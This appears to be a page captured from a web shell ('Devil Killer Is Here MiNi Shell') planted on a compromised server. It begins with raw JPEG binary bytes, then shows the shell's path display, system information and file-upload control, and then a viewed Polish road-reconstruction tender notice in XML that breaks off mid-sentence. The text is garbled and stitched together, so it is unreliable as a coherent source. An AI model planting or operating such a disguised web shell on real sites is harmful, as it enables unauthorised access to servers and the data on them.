JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17057_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17057</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Powiatowy Zarząd Dróg</nazwa><ulica>ul. J. Dąbrowskiego</ulica><nr_domu></nr_domu><nr_miesz></nr_miesz><miejscowosc>Lubań</miejscowosc><kod_poczt>59800 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>dolnośląskie</wojewodztwo><tel>756 463 750</tel><fax>756 462 192</fax><email>pzdluban@cyberia.pl</email><internet></internet><adres_strony_internetowej_narzedzia>www.pzdluban.bip.net.pl </adres_strony_internetowej_narzedzia><adres_strony_url>www.pzdluban.bip.net.pl </adres_strony_url><podmiot2c></podmiot2c><regon>23082738800000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu>„Przebudowa drogi powiatowej nr 2454D Siekierczyn – Nowa Karczma  w km 3+306 - 6+606  o długości 3,3 km”</nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy>T</czy_przeprowadza_centralny_zamawiajacy><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia>T</czy_dostep_dokumentow_zamowienia><dostep_dokumentow_zamowienia>www.pzdluban.bip.net.pl </dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.pzdluban.bip.net.pl </zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>w wersji papierowej</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><oferty_lub_wnioski /><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Powiatowy Zarząd Dróg, 59-800 Lubań, ul. Dąbrowskiego29c</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>„Przebudowa drogi powiatowej nr 2454D Siekierczyn – Nowa Karczma 
w km 3+306 - 6+606  o długości 3,3 km”
</nazwa_zamowienia><numer_referencyjny></numer_referencyjny><czy_dialog_techniczny /><rodz_zam>B</rodz_zam><przedmiot_zam>Przedmiotem zamówienia jest opracowanie dokumentacji projektowej i wykonanie robót budowlanych w ramach formuły „zaprojektuj i wybuduj” pn.:

„Przebudowa drogi powiatowej nr 2454D Siekierczyn – Nowa Karczma 
w km 3+306 - 6+606  o długości 3,3 km”

Jezdnia
1. wymiana warstwy wiążącej i ścieralnej wraz z wyrównaniem
	- warstwa ścieralna z SMA o grubości 5cm
	- warstwa wiążąca z betonu asfaltowego AC16W o grubości 5cm
	- warstwa wyrównawcza z betonu asfaltowego AC16W o grubości 3 cm
	- miejscowe frezowanie istniejącej nawierzchni jezdni
2. częściowe poszerzenie jezdni do szerokości 5,0 m
 - korytowanie na głębokości 40 cm
 - warstwa odsączająca w korycie, zagęszczenie mechanicznie – grub. 10cm
 - podbudowa zasadnicza z kamienia łamanego stabilizowanego mech. o uziarnieniu  
    0/63 mm – grub. 20 cm
-  skropienie podbudowy emulsją asfaltową 50% w ilości 0,80 kg/m2
-  podbudowa zasadnicza z betonu asfaltowego AC22P o grubości 10 cm

Zatoki
konstrukcja zatok:

- wykonanie koryta 
- podbudowa pomocnicza mrozoochronną z gruntu stabilizowanego cementem o Rm=2,5 
   MPa, grub. 15 cm 
-  podbudowa zasadnicza z betonu cementowego B20 - C16/20 o grubości 20cm
-  nawierzchnia z kostki betonowej grubości 8cm na podsypce cementowo-piaskowej  
   gr. 3 cm
Budowa chodników
- ława pod krawężnik 20x30 cm, beton C12/15 wraz z korytowaniem 
- krawężnik betonowy 15x30 cm na podsypce cementowo-piaskowej
- ława pod opornik 8x30 cm, C12/15 wraz z korytowaniem 
- opornik betonowy 8x30 cm, na podsypce cementowo – piaskowej 
- podbudowa z kamienia łamanego stabilizowanego mech. o uziarnieniu 0/31,5 mm – 
  grub. 15 cm
- nawierzchnia z kostki betonowej grubości 8cm na podsypce cementowo-piaskowej 
  gr. 3 cm 

Odwodnienie
	- wykopy w gruncie kat  1/4 łącznie z wywozem 
	- czyszczenie i reprofilacja istniejących rowów, wykonanie nowych rowów  
           przydrożnych z wywozem urobku 
	- podłoże z materiałów sypkich oraz podłoża betonowe
	- montaż studzienek ściekowych – uliczne betonowe fi 500 mm wraz z 
          osadnikiem i wpustem 
	- studnie rewizyjne fi 1000 mm – właz żeliwny z wypełnieniem betonowym 
	- kanały z rur PVC fi 200-400 mm na wcisk w wykopie z wpięciem do 
           projektowanych studni rewizyjnych
	- kanały przepustów z rur HDPE o średnicy fi 400–800 mm
	- ściany czołowe w kamienia łamanego na betonie B20 – C16/20 dla  
          przepustów fi 400-800 mm wraz z wykonaniem wykopu i zasypki
	- umocnienie rowów prefabrykatami betonowymi typu KS-1
	- umocnienie skarp płytami betonowymi, ażurowymi typu krata 60x40x8 cm
	- ułożenie ścieku korytkowego podchodnikowego – prefabrykaty betonowe  
          60x50x15 na ławie betonowej
	- ułożenie ścieku rzędowego z kostki kamiennej na ławie betonowej C16/20
 
Zjazdy
podbudowa na zjazdach:
	- korytowanie wraz z wywozem 
	- warstwa odsączająca w korycie, zagęszczenie mechaniczne grub. 10 cm
	- podbudowa zasadnicza z kamienia łamanego stabilizowanego mech. 
           o uziarnieniu 0/31,5 – grub. 20 cm
	- skropienie podbudowy emulsja asfaltową 50% w ilości 0,80 kg/m2
	- warstwa ścieralna z betonu asfaltowego AC11S

Oznakowanie poziome i pionowe
- opracowanie projektu i wdrożenie stałej organizacji ruchu.

Przebudowa mostu
	- rozbiórka obiektów budowlanych, inżynierskich i elementów nawierzchni  
          wraz z wywiezieniem
	- wykopy w gruncie niespoistym wraz z umocnieniem
	- formowaniem nasypów z zagęszczeniem
	- zbrojenie betonu ław fundamentowych i ścian czołowych stalą A-IIIN wraz  
           z przygotowaniem i montażem
	- betonowanie ław fundamentowych z zagęszczeniem betonu wibratorem – beton  
           B30 - C25/30
	- deskowanie i betonowanie ścian czołowych wraz z zagęszczeniem betonu 
          wibratorem - beton B30 - C25/30
	- ściana oporowa z kamienia łamanego na betonie B20 – C16/20
	- montaż konstrukcji stalowej z blachy falistej o przekroju łukowo-kołowym
	- montaż barieroporęczy mostowej H2 W1 B oraz barier ochronnych stalowych N2 W3 B
	- wykonanie izolacji na zimno z roztworu asfaltowego
	- plantowanie skarp i dna wykopu, okładzina kamienna dna cieku, gurty  
           denne z kamienia łamanego na B20
	- zabezpieczenie powierzchni betonowych – czyszczenie i malowanie 
           powłokami na bazie akrylu

Utwardzenie poboczy
	- plantowanie powierzchni gruntu kat. 1/2
	- pobocza z kamienia łamanego stabilizowanego mech. o uziarnieniu 0/31,5 –    
          grub. 10 cm
	- zagęszczenie poboczy do uzyskania stopnia zagęszczenia Is&gt;=0,98
  - ścinka istniejącego, zawyżonego pobocza wraz z wyrównaniem skarp
  - utwardzenie poboczy na „łukach”  frezowiną uzyskaną z frezowania nawierzchni 
     remontowanego odcinka.

</przedmiot_zam><cpv1c>45233142-6</cpv1c><cpv2c>45100000-8</cpv2c><okres2c>31/10/2018</okres2c><szacunkowa_wart_zam_calosc>3365853.66</szacunkowa_wart_zam_calosc><waluta_calosc>pln.</waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow>Wykonawca robót obowiązany jest do zachowania chronologii uzyskiwanych zezwoleń przed przystąpieniem do realizacji robót budowlanych.

UWAGA! Zadanie będzie realizowane (rozliczane) w dwóch Etapach:

Etap I 
- wykonanie dokumentacji projektowej dla km od 3+306 do km 6+606 wraz z uzyskaniem uzgodnień, zezwoleń i wymaganych decyzji (pozwoleń) oraz realizacja robót budowlanych dla km od 3+306 do 5+206 i zgłoszenie zakończenia robót – do dnia                 31 października 2017r.

ETAP II 
- realizacja robót budowlanych dla km od 5+206 do 6+606 i zgłoszenie zakończenia robót – do dnia 31 października 2018r.

Termin zakończenia robót – uważa się termin do upływu którego Wykonawca zobowiązany jest zakończyć wszystkie roboty i dokonać zgłoszenia gotowości do odbioru końcowego wraz z dostarczeniem kompletnej dokumentacji powykonawczej.

Wykonawca w cenie oferty wykona tablice informacyjne wg wzoru określonego                           w Rozporządzeniu wykonawczym Komisji Unii Europejskiej Nr 2016/669 z dni 28 kwietnia 2016r. (załącznik nr 3) przedstawionego przez Zamawiającego - szt. 2


</informacje_na_temat_katalogow><okreslenie_warunkow></okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow></sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Warunek ten zostanie spełniony, gdy Wykonawca:
- wykaże wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie co najmniej jedno zadania w zakresie budowy lub przebudowy lub remontu drogi min. klasy G, o wartości min. 500.000,00 złotych brutto wraz z podaniem rodzaju robót, wartości, daty, miejsca  wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
- wykaże dysponowanie co najmniej jedną osobą na stanowisku Kierownika Budowy, posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającą doświadczenie zawodowe na stanowisku Kierownika Budowy/Kierownika Robót Drogowych przy realizacji co najmniej jednego zadania polegającego na budowie lub przebudowie lub remoncie drogi min. klasy G, o wartości zadania nie niższej niż 500.000,00 złotych brutto.
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2>T</art_24_ust_5_pkt_2><art_24_ust_5_pkt_3>T</art_24_ust_5_pkt_3><art_24_ust_5_pkt_4>T</art_24_ust_5_pkt_4><art_24_ust_5_pkt_5>T</art_24_ust_5_pkt_5><art_24_ust_5_pkt_6>T</art_24_ust_5_pkt_6><art_24_ust_5_pkt_7>T</art_24_ust_5_pkt_7><art_24_ust_5_pkt_8>T</art_24_ust_5_pkt_8><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen></wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu></zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>OPIS SPOSOBU PRZYGOTOWANIA OFERT
- Wykonawca może złożyć tylko jedną ofertę.
- Zamawiający nie dopuszcza składania ofert częściowych.
- Zamawiający nie dopuszcza składania ofert wariantowych.
- Ofertę stanowi wypełniony „Formularz oferty” oraz niżej wymienione wypełnione dokumenty:
- Formularz ofertowy – wg załącznika nr 1 do SIWZ; 
- kosztorys ofertowy w zakresie robót jakie uwzględnia PFU (załącznik nr 2)
- Wraz z ofertą powinny być złożone:
- Oświadczenia wymagane postanowieniami pkt 6.1. SIWZ;
- Oświadczenia dla podmiotów, na zdolnościach lub sytuacji których polega Wykonawca, wymagane postanowieniami pkt 7.8. SIWZ;
- Zobowiązania wymagane postanowieniami pkt 7.2. SIWZ, w przypadku gdy Wykonawca polega 
na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału 
w postępowaniu; 
- Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii;
- Dokumenty, z których wynika prawo do podpisania oferty (oryginał lub kopia potwierdzona 
za zgodność z oryginałem przez notariusza), względnie do podpisania innych dokumentów składanych wraz z ofertą, chyba, że Zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2014 poz. 1114 oraz z 2016 poz. 352), a Wykonawca wskazał 
to wraz ze złożeniem oferty, o ile prawo do ich podpisania nie wynika z dokumentów złożonych wraz z ofertą;
- Dokument potwierdzający wniesienie wadium.
- Oferta powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy.
- Oferta oraz pozostałe oświadczenia i dokumenty, dla których Zamawiający określił wzory w formie formularzy zamieszczonych w SIWZ, powinny być sporządzone zgodnie z tymi wzorami, co do treści oraz opisu kolumn i wierszy.
- Oferta powinna być sporządzona w języku polskim, z zachowaniem formy pisemnej pod rygorem nieważności. Każdy dokument składający się na ofertę powinien być czytelny.
- Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN. Rozliczenia nie będą prowadzone w walutach obcych.  
- Jeżeli Wykonawca załączy dokument na potwierdzenie spełniania warunków udziału w postępowaniu, w których wartości podane będą w walutach innych niż złoty polski, zostaną one przeliczone według Tabeli A kursów średnich walut obcych Narodowego Banku Polskiego z dnia podpisania protokołu odbioru końcowego lub równoważnego dokumentu potwierdzającego datę zakończenia robót budowlanych.
- Każda poprawka w treści oferty, a w szczególności każda zmiana, przekreślenie, uzupełnienie, nadpisanie, etc. powinno być parafowane przez Wykonawcę, w przeciwnym razie nie będzie uwzględnione.
- Zamawiający informuje, iż zgodnie z art. 8 ust. 3 ustawy Pzp, nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, 
że nie mogą być one udostępniane oraz wykazał, załączając stosowne wyjaśnienia, 
iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy Pzp. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2003 r. Nr 153, poz. 1503 ze zm.), które Wykonawca pragnie zastrzec jako tajemnicę przedsiębiorstwa, winny być załączone w osobnym opakowaniu, w sposób umożliwiający łatwe od niej odłączenie i opatrzone napisem: „Informacje stanowiące tajemnicę przedsiębiorstwa – nie udostępniać”, z zachowaniem kolejności numerowania stron oferty.
- Wykonawca winien wykazać, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa poprzez załączenie dowodów potwierdzających, że:
- informacje nie są ujawnione do wiadomości publicznej,
- informacje mają charakter techniczny, technologiczny, organizacyjny lub inny, o ile ma wartość gospodarczą,
- Wykonawca poczynił działania w celu zachowania poufności tych informacji poprzez ochronę fizyczną lub prawną. 
Brak elementu wykazania, że informacje stanowią tajemnicę przedsiębiorstwa, będzie powodował, 
że zastrzeżenie nie będzie miało zastosowania.
Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy.

ZAŁĄCZNIK NR 1 -  FORMULARZ OFERTY
ZAŁĄCZNIK NR 2 -  KOSZTORYS ZGODNY Z PROGRAMEM FUNKCJONALNO-UŻYTKOWY (PFU) 

ZAŁĄCZNIK NR 3 -  OŚWIADCZENIE O BRAKU PODSTAW DO WYKLUCZENIA I SPEŁNIANIU    
                  WARUNKÓW UDZIAŁU W POSTĘPOWANIU 
ZAŁĄCZNIK NR 4 -  WYKAZ ROBÓT BUDOWLANYCH
ZAŁĄCZNIK NR 5 -  WYKAZ OSÓB, SKIEROWANYCH PRZEZ WYKONAWCĘ DO REALIZACJI ZAMÓWIENIA  
                  PUBLICZNEGO
ZAŁĄCZNIK NR 6 -  PROPOZYCJA/WZÓR ZOBOWIĄZANIA INNEGO PODMIOTU  
ZAŁĄCZNIK NR 7 -  OŚWIADCZENIE O PRZYNALEŻNOŚCI LUB BRAKU PRZYNALEŻNOŚCI DO TEJ 
                  SAMEJ GRUPY KAPITAŁOWEJ.


</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium>Wykonawca jest zobowiązany do wniesienia wadium w wysokości 40.000,00 złotych w formie zgodniej z art. 45 ust. 6 PZP, tj.:
a)	w pieniądzu;
b)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	w gwarancjach bankowych;
d)	w gwarancjach ubezpieczeniowych;
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy                z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity 2016. 359). 
13.2.	W przypadku złożenia wadium w formie pieniężnej, wadium należy wnieść przelewem na konto Powiatowego Zarządu Dróg w BGŻ S.A. 10 2030 0045 1110 0000 0080 6480 z dopiskiem:     
 „Przebudowa drogi powiatowej nr 2454D Siekierczyn – Nowa Karczma w km 3+306 - 6+606 o długości 3,3 km”.
Wadium winno być na koncie Zamawiającego nie później niż przed upływem terminu składania ofert. Dowód potwierdzenia złożenia wadium należy załączyć do oferty.
Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.
13.3. 	W przypadku złożenia wadium w formie gwarancji, poręczeń, oryginał dokumentu należy złożyć 
nie później niż przed upływem terminu składania ofert. Kopię dokumentu, należy dołączyć do oferty, za wyjątkiem pkt 13.4. SIWZ.
Koniecznym jest aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp.
	Gwarancja lub poręczenie musi zawierać w swojej nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium.
13.4. 	Jeśli Wykonawca prześle ofertę pocztą/przekaże za pośrednictwem kuriera lub innej osoby, winien kopię dowodu wniesienia wadium załączyć do oferty, natomiast oryginał umieścić w oznaczonej kopercie „oryginał dowodu wniesienia wadium”.
13.5.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem pkt 13.12. SIWZ.
13.6. 	Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano, z zastrzeżeniem pkt 13.10. SIWZ.
13.7. 	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
13.8. 	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium zgodnie z punktem 13.5. SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana, jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
13.9. 	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
13.10. 	Wadium wraz z odsetkami wniesione w pieniądzu przez Wykonawcę, którego oferta została uznana 
